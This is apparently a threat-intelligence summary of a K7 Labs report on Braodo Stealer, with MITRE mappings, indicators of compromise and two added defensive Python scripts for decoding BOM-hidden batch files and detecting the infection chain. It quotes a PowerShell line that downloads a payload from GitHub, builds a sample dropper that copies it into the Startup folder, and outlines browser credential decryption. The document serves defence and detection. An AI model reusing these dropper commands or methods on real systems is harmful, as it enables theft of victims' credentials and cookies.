Braodo Stealer is a Python-based information stealer that covertly collects cookies, credentials, and system data, then exfiltrates the results to Telegram bots. The post traces Braodo’s multi-stage delivery—from a ZIP containing a BOM-obfuscated BAT file, through Startup-folder persistence and a GitHub-hosted second stage, to Python-based collection and exfiltration of browser data and host information. #BraodoStealer #VietnameseMalware #TelegramAPI
Keypoints
- Braodo Stealer is a Python-based information stealer that collects cookies, saved credentials, and system data into a ZIP file for exfiltration.
- The dropper is a BAT file prefixed with a UTF-16 byte-order mark (FF FE) so its contents display as unreadable characters; it launches PowerShell to download additional payloads from GitHub.
- Persistence is achieved by writing WindowsSecure.bat into the Startup folder to survive reboots.
- The malware downloads Document.zip from GitHub, which contains the actual Python payload (sim.py) executed by python.exe.
- It enumerates installed browsers, decrypts their Login Data and Cookies databases with the AES key held in each browser's Local State file, and gathers host details (computer name, user name, Windows version, local time) plus the public IP via ipinfo.io.
- Collected data is written to text files, compressed into a ZIP, and exfiltrated to Telegram via API bots before being deleted from disk.
- The campaign leans on evasion, and the GitHub-hosted stages are updated frequently; the post recommends security products such as K7 Total Security for protection.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The bat file is downloaded from GitHub by PowerShell: “Invoke-WebRequest -URI https://github.com/ohlisit/123/raw/main/update.bat -OutFile …”
- [T1059.001] PowerShell – The malware “starts the PowerShell process and downloads a bat file from GitHub URL” to fetch further payloads.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Writes “WindowsSecure.bat” to the Startup folder so the chain re-runs at every logon.
- [T1082] System Information Discovery – Retrieves “computer name, current login user name, windows version, time of computer, IP of system” via ipinfo.io.
- [T1555.003] Credentials from Web Browsers – Checks browser paths, decrypts “Login data” and “Cookies” using AES with the master key from Local State (in Chromium-based browsers that key is itself DPAPI-protected, so the decryption only succeeds in the victim's own user context, which is why stealers run it on the host rather than offline).
- [T1560] Archive Collected Data – After collecting data, “converts the files into a zip file” for exfiltration.
- [T1071.001] Web Protocols – Uses Telegram API bots to transmit stolen data: “Telegram API bots URL strings” used to send data.
- [T1041] Exfiltration Over C2 Channel – Sends the zipped data to a Telegram channel: “sends that zip file to the Telegram channel.”
- [T1027] Obfuscated/Compressed Files or Information – The initial BAT is hidden by a BOM: “starts with unicode ‘FF FE’ which uses BOM, to show the batch file data as unreadable characters.”
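The BOM trick in the keypoints and in T1027 above is cheap to undo in triage: a file that begins with FF FE is just UTF-16LE text, and decoding it with the right codec exposes the PowerShell download and the Startup-folder copy. The script below is an added example written for this summary, not code from the K7 Labs post or from the malware. The batch text it inspects is constructed: the GitHub URL is the one quoted in the report, while the -OutFile path and the copy command into the Startup folder are assumed for illustration.

```python
"""Triage a batch file hidden behind a byte-order mark.

Added example by the editor, not code from the K7 Labs post. The batch text
below is constructed for illustration: the GitHub URL is the one quoted in
the report, the -OutFile path and the copy command are assumed.
"""
import re

# Codecs that strip the BOM when decoding. Python's "utf-16" codec reads the
# BOM itself, so it handles both FF FE (LE, what Braodo uses) and FE FF (BE).
BOM_CODECS = {
    b"\xff\xfe": "utf-16",
    b"\xfe\xff": "utf-16",
    b"\xef\xbb\xbf": "utf-8-sig",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
PS_DOWNLOAD_RE = re.compile(
    r"powershell.*(invoke-webrequest|\biwr\b|downloadstring|downloadfile)", re.I
)
OUTFILE_RE = re.compile(r'-OutFile\s+"?([^\s"]+)', re.I)
STARTUP_DROP_RE = re.compile(r'\\Startup\\([^\s"]+)', re.I)


def detect_bom(data: bytes):
    """Return the codec name for a leading BOM, or None if the file starts with plain text."""
    for bom, codec in BOM_CODECS.items():
        if data.startswith(bom):
            return codec
    return None


def decode_bat(data: bytes) -> str:
    """Decode a .bat file to text, honouring a BOM if present."""
    codec = detect_bom(data)
    if codec is None:
        return data.decode("latin-1")  # plain batch files are single-byte; never raises
    return data.decode(codec)


def extract_indicators(text: str) -> dict:
    """Pull the delivery-chain artefacts a responder wants out of the decoded script."""
    urls = URL_RE.findall(text)
    return {
        "urls": urls,
        "github_raw": [u for u in urls if "github" in u.lower() and "/raw/" in u],
        "powershell_download": bool(PS_DOWNLOAD_RE.search(text)),
        "dropped_files": OUTFILE_RE.findall(text),
        "startup_persistence": STARTUP_DROP_RE.findall(text),
    }


def triage(data: bytes) -> dict:
    """Full pass: BOM check, decode, indicator extraction, verdict."""
    findings = extract_indicators(decode_bat(data))
    findings["bom"] = detect_bom(data)
    # A batch file that hides behind a UTF-16 BOM, downloads from GitHub and
    # writes into the Startup folder is the pattern the report describes.
    findings["verdict"] = (
        "suspicious"
        if findings["bom"] and findings["github_raw"] and findings["startup_persistence"]
        else "review"
    )
    return findings


# Constructed sample: the script as it reads once decoded, then re-encoded as
# UTF-16LE with the FF FE BOM that the report describes.
SAMPLE_BAT = (
    "@echo off\r\n"
    "powershell -c \"Invoke-WebRequest -URI https://github.com/ohlisit/123/raw/main/update.bat"
    " -OutFile %TEMP%\\update.bat\"\r\n"
    "copy %TEMP%\\update.bat \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat\"\r\n"
)
SAMPLE_BYTES = b"\xff\xfe" + SAMPLE_BAT.encode("utf-16-le")

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BYTES).items():
        print(f"{key:20} {value}")
```

Opening the raw bytes in a single-byte editor shows the NUL-interleaved "garbage" the report mentions; `cmd.exe` nevertheless runs the file, so the BOM buys the attacker nothing against this kind of decode, only against a casual glance.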
Indicators of Compromise
- [File Name] health-records-x-ray-n (dropper carried in the initial ZIP), WindowsSecure.bat (copy placed in the Startup folder for persistence)
- [Hash] 4BA8BDD684441EF9F6F9AC7DE7EDB28B (MD5) – Associated with the health-records-x-ray-n sample
- [URL] https://github.com/ohlisit/123/raw/main/update.bat, https://github.com/ohlisit/123/raw/main/Document.zip – Download sources used by the malware
- [Domain] ipinfo.io – Used to fetch system information (IP, host data)
- [URL] https://api.telegram.org – Used for exfiltration to Telegram via API bots
- [Process] python.exe, powershell.exe – Processes spawned during execution and payload deployment
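The indicators above are most useful when tied to the behaviour each stage produces: PowerShell pulling a raw GitHub URL, a .bat landing in the Startup folder, python.exe spawned by cmd.exe from a user-writable path, and that same python.exe reaching ipinfo.io and api.telegram.org. The following detection logic is an added example by the editor, not from the K7 Labs post; it runs over constructed, Sysmon-like event records. The hostnames, URLs and file names come from the IoC list, while the file paths, parent processes, host names and the two benign events are assumed.

```python
"""Behavioural detection for the Braodo delivery chain over constructed telemetry.

Added example by the editor, not from the K7 Labs post. Events are Sysmon-like
dicts (process create, file create, network connect); paths, parents and the
benign WS02 events are assumed, the hosts/URLs/file names are the report's IoCs.
"""
import re
from collections import defaultdict

# github.com/<user>/<repo>/raw/... redirects to raw.githubusercontent.com; match both.
RAW_GITHUB_RE = re.compile(
    r"https://(raw\.githubusercontent\.com|github\.com/[^\s/]+/[^\s/]+/raw)/", re.I
)
PS_DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I)
STARTUP_BAT_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.bat$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(temp|appdata)\\", re.I)
# Destinations the stealer contacts, mapped to the MITRE technique each implies.
STEALER_HOSTS = {"api.telegram.org": "T1071.001/T1041", "ipinfo.io": "T1082"}


def rule_powershell_github(ev):
    if ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe"):
        if PS_DOWNLOAD_RE.search(ev["cmdline"]) and RAW_GITHUB_RE.search(ev["cmdline"]):
            return ("powershell_github_download", "T1059.001/T1105")
    return None


def rule_startup_bat(ev):
    if ev["type"] == "file" and STARTUP_BAT_RE.search(ev["path"]):
        return ("startup_bat_persistence", "T1547.001")
    return None


def rule_python_from_batch(ev):
    # python.exe launched by cmd.exe with a script under %TEMP% or %APPDATA%
    if (ev["type"] == "process" and ev["image"].lower().endswith("python.exe")
            and ev["parent"].lower().endswith("cmd.exe")
            and USER_WRITABLE_RE.search(ev["cmdline"])):
        return ("python_spawned_by_batch", "T1059.006")
    return None


def rule_stealer_egress(ev):
    if ev["type"] == "network" and ev["image"].lower().endswith("python.exe"):
        technique = STEALER_HOSTS.get(ev["dest_host"].lower())
        if technique:
            return (f"python_to_{ev['dest_host'].lower()}", technique)
    return None


RULES = [rule_powershell_github, rule_startup_bat, rule_python_from_batch, rule_stealer_egress]


def evaluate(events):
    """Run every rule over every event; return one hit per (event, rule) match."""
    hits = []
    for index, ev in enumerate(events):
        for rule in RULES:
            match = rule(ev)
            if match:
                hits.append({"event": index, "host": ev["host"],
                             "rule": match[0], "technique": match[1]})
    return hits


def correlate(hits, threshold=3):
    """Hosts on which at least `threshold` distinct rules fired: the chain, not a single stage."""
    per_host = defaultdict(set)
    for hit in hits:
        per_host[hit["host"]].add(hit["rule"])
    return sorted(host for host, rules in per_host.items() if len(rules) >= threshold)


# Constructed telemetry. WS01 replays the chain from the report; WS02 carries two
# benign look-alikes (curl from raw GitHub, a developer's python reaching PyPI).
EVENTS = [
    {"type": "process", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": r'cmd /c "C:\Users\u\Downloads\records.bat"'},
    {"type": "process", "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell Invoke-WebRequest -URI https://github.com/ohlisit/123/raw/main/update.bat -OutFile C:\Users\u\AppData\Local\Temp\update.bat"},
    {"type": "file", "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat"},
    {"type": "process", "host": "WS01", "image": r"C:\Users\u\AppData\Local\Temp\python\python.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"python.exe C:\Users\u\AppData\Local\Temp\sim.py"},
    {"type": "network", "host": "WS01", "image": r"C:\Users\u\AppData\Local\Temp\python\python.exe",
     "dest_host": "ipinfo.io", "dest_port": 443},
    {"type": "network", "host": "WS01", "image": r"C:\Users\u\AppData\Local\Temp\python\python.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"type": "process", "host": "WS02", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl -O https://raw.githubusercontent.com/org/tools/main/setup.ps1"},
    {"type": "network", "host": "WS02", "image": r"C:\Python311\python.exe",
     "dest_host": "pypi.org", "dest_port": 443},
]

if __name__ == "__main__":
    for hit in evaluate(EVENTS):
        print(hit)
    print("chain on:", correlate(evaluate(EVENTS)))
```

Each rule on its own will fire on legitimate activity now and then (administrators do fetch scripts from GitHub, developers do run Python from AppData), which is why `correlate` only raises the host once several distinct stages are seen together; the individual hits remain useful as hunting pivots.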
Read more: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/